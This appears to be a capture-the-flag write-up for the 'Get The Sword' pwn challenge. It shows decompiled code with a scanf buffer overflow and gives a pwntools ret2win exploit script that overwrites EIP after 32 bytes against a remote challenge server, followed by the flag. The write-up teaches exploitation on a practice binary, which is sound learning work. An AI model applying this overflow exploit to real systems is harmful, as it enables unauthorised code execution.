Get The Sword

Challenge Description :

Basic Binary Enumeration :

we can see that the binary is 32 bit not stripped that means that the functions names are not obfuscated and all the protections are off

let's open the binary in ghidra to analyze it and find potential vulnerabilities

we have 4 functions

undefined4 main(void)
{
  printSword();
  intro();
  return 0;
}

void printSword(void)

{
  puts("      />_________________________________");
  puts("[#####[]_________________________________>");
  puts("      \\>");
  fflush(stdout);
  return;
}

void intro(void)

{
  undefined local_20 [24];
  
  printf("What do you want ? ?: ");
  fflush(stdout);
  __isoc99_scanf(&%s,local_20); // BOF vulnerability
  printf("You want, %s\n",local_20);
  return;
}

// win function
void getSword(void)

{
  system("cat flag.txt");
  fflush(stdout);
  return;
}

the function intro is vulnerable since it reads from the user without checking the size of the data received.

Offset to EIP :

we can use gdb to find the offset and we can also use ghidra.

in ghidra we can see that the offset to reach the EIP is 0x20 which 32

Exploit :

from pwn import *

# Set up pwntools for the correct architecture
exe = './get_sword'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# io = process(exe)
io = remote('173.255.201.51', 31337)
offset = 32
ret = 0x0804900e #ret gadget (ropper --file=ret2win --search="ret") 
payload = flat(
	offset * b'A',
	elf.functions.getSword
)

io.sendlineafter(b':', payload)

io.interactive()

Flag :

KCTF{so_you_g0t_the_sw0rd}

Previouspwn Next The Dragon's Secret Scroll

Last updated 1 year ago

Was this helpful?